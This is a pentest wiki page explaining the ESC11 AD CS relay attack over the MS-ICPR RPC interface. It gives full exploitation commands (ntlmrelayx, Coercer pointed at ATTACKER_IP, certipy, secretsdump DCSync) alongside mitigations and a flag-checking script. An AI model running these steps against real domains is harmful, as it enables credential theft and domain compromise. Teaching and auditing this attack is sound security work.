# ESC11

**What is ESC11?**

ESC11 is similar to ESC8 but instead of relaying authentication to the **HTTP enrollment endpoint**, we relay over the **RPC interface** of the Certificate Authority using the **ICertPassage Remote Protocol (MS-ICPR)**.

The MS-ICPR RPC interface supports NTLM authentication and can be used to request certificates for Windows client authentication enrollment making it a viable relay target just like the HTTP interface in ESC8.

***

**Key Condition: `IF_ENFORCEENCRYPTICERTREQUEST`**

This flag controls whether **packet privacy (encryption)** is enforced on the RPC interface:

| Flag State             | Result                                                           |
| ---------------------- | ---------------------------------------------------------------- |
| **Set (enabled)**      | Packet privacy enforced; NTLM relay over RPC is **not possible** |
| **Not set (disabled)** | No encryption enforced; ESC11 is **exploitable**                 |

> **Note:** This flag is **enabled by default** on Windows Server 2012 and later. ESC11 is only exploitable if it has been explicitly disabled or if an older CA is in use.

You can verify this with Certipy:

```bash
certipy find -u username@domain.corp -p 'Password' -dc-ip <DC_IP> -stdout -vulnerable
```

Look for:

```
Enforce Encryption for Requests: Disabled
```

If disabled → the CA is vulnerable to ESC11.

***

**How ESC11 Differs from ESC8**

|                         | ESC8                                   | ESC11                                         |
| ----------------------- | -------------------------------------- | --------------------------------------------- |
| **Relay target**        | HTTP enrollment endpoint (`/certsrv/`) | RPC interface (MS-ICPR)                       |
| **Blocked by**          | EPA / NTLM signing on IIS              | `IF_ENFORCEENCRYPTICERTREQUEST` flag          |
| **Default vulnerable?** | Yes, if Web Enrollment role installed  | No, flag is enabled by default on Server 2012+ |
| **Tools**               | ntlmrelayx + Coercer                   | ntlmrelayx (RPC mode) + Coercer               |

***

### **Exploitation Using Linux**

**Step 1: Start the NTLM Relay Listener**

```bash
ntlmrelayx.py -t "rpc://ca.domain.corp" -rpc-mode ICPR -icpr-ca-name "CA-NAME" -smb2support --adcs --template "DomainControllerAuthentication"
```

* `-rpc-mode ICPR`: targets the ICertPassage RPC interface
* `-icpr-ca-name`: must match the exact CA name
* `--template`: use `DomainControllerAuthentication` when targeting a DC machine account

***

**Step 2: Coerce Authentication from the Target**

```bash
Coercer.py coerce -l <ATTACKER_IP> -t dc01.domain.corp -u username -p 'Password' -d domain.corp -v --filter-method-name "EfsRpcDuplicateEncryptionInfoFile"
```

Same coercion approach as ESC8: Coercer abuses alternate RPC methods to bypass the patched PetitPotam and SpoolSample vectors.

If relay succeeds, `ntlmrelayx` outputs a `.pfx` certificate for the relayed account.

***

**Step 3: Authenticate and Retrieve NTLM Hash**

```bash
certipy auth -pfx dc01.pfx -dc-ip <DC_IP>
```

This performs **UnPAC-the-Hash**, returning the NT hash of the machine account.

***

**Step 4: DCSync**

```bash
secretsdump.py -hashes :<NT_HASH> 'domain.corp/dc01$@dc01.domain.corp'
```

***

**Mitigation**

| Fix                                       | How                                                                                                         |
| ----------------------------------------- | ----------------------------------------------------------------------------------------------------------- |
| Re-enable `IF_ENFORCEENCRYPTICERTREQUEST` | Run `certutil -config "CA" -setreg CA\InterfaceFlags +IF_ENFORCEENCRYPTICERTREQUEST` then restart `certsvc` |
| Enable NTLM signing                       | Prevents relay at the network level                                                                         |
| Restrict template enrollment              | Limit `DomainControllerAuthentication` template access                                                      |
| Add DCs to Protected Users                | Prevents NTLM auth from DC accounts                                                                         |

To re-enable the flag:

```bash
certutil -config "ca.domain.corp\CA-NAME" -setreg CA\InterfaceFlags +IF_ENFORCEENCRYPTICERTREQUEST
net stop certsvc && net start certsvc
```
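The check in the verification section and the `+IF_ENFORCEENCRYPTICERTREQUEST` fix above both come down to one bit in the CA's `InterfaceFlags` DWORD. The following is an added example (not code from the original page, Certipy or certutil) that decodes that DWORD, applies the ESC11 condition, shows what the `+` form of `certutil -setreg` leaves behind, and reads the Certipy line the page says to look for; the flag bit values are the `InterfaceFlags` constants from MS-CSRA/MS-WCCE, and the Certipy excerpt and the sample DWORD `0x441` are constructed.

```python
import re

# InterfaceFlags bit values as defined in MS-CSRA / MS-WCCE.
INTERFACE_FLAGS = {
    "IF_LOCKICERTREQUEST":           0x00000001,
    "IF_NOREMOTEICERTREQUEST":       0x00000002,
    "IF_NOLOCALICERTREQUEST":        0x00000004,
    "IF_NORPCICERTREQUEST":          0x00000008,
    "IF_NOREMOTEICERTADMIN":         0x00000010,
    "IF_NOLOCALICERTADMIN":          0x00000020,
    "IF_NOREMOTEICERTADMINBACKUP":   0x00000040,
    "IF_NOLOCALICERTADMINBACKUP":    0x00000080,
    "IF_NOSNAPSHOTBACKUP":           0x00000100,
    "IF_ENFORCEENCRYPTICERTREQUEST": 0x00000200,
    "IF_ENFORCEENCRYPTICERTADMIN":   0x00000400,
    "IF_ENABLEEXITKEYRETRIEVAL":     0x00000800,
    "IF_ENABLEADMINASAUDITOR":       0x00001000,
}

def decode_interface_flags(value: int) -> list[str]:
    """Names of every flag set in the DWORD, lowest bit first."""
    return [name for name, bit in INTERFACE_FLAGS.items() if value & bit]

def esc11_exposed(value: int) -> bool:
    """ESC11 condition: packet privacy is NOT enforced on the ICPR interface."""
    return not (value & INTERFACE_FLAGS["IF_ENFORCEENCRYPTICERTREQUEST"])

def with_encryption_enforced(value: int) -> int:
    """Result of certutil -setreg CA\\InterfaceFlags +IF_ENFORCEENCRYPTICERTREQUEST:
    the '+' form ORs the named flag into the existing value, it does not replace it."""
    return value | INTERFACE_FLAGS["IF_ENFORCEENCRYPTICERTREQUEST"]

# Constructed sample of the Certipy 'find' block the page tells you to inspect.
CERTIPY_EXCERPT = """\
    CA Name                             : CA-NAME
    DNS Name                            : ca.domain.corp
    Enforce Encryption for Requests     : Disabled
"""

def certipy_reports_exposed(text: str) -> bool:
    """True when Certipy prints 'Enforce Encryption for Requests: Disabled'."""
    m = re.search(r"Enforce Encryption for Requests\s*:\s*(\w+)", text)
    if m is None:
        raise ValueError("no 'Enforce Encryption for Requests' line in excerpt")
    return m.group(1).lower() == "disabled"

# Constructed weak value: lock + no remote admin backup + encrypt admin, request bit cleared.
WEAK_FLAGS = 0x441
```

Running `decode_interface_flags(WEAK_FLAGS)` next to `decode_interface_flags(with_encryption_enforced(WEAK_FLAGS))` shows exactly one flag added by the fix, which is the thing to confirm after the `certutil` command and `certsvc` restart.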

***

**Resources**

* [SpecterOps — ESC11: NTLM Relay to AD CS RPC](https://docs.specterops.io/ghostpack-docs/Certify.wik-mdx/esc11-ntlm-relay-to-ad-cs-rpc-interfaces)
* [Pentest Everything — ESC11](https://viperone.gitbook.io/pentest-everything/everything/everything-active-directory/adcs/esc11)
* Altered Security AD CS Lab
* [Certipy Wiki ESC11](https://github.com/ly4k/Certipy/wiki/06-%E2%80%90-Privilege-Escalation#ESC11)
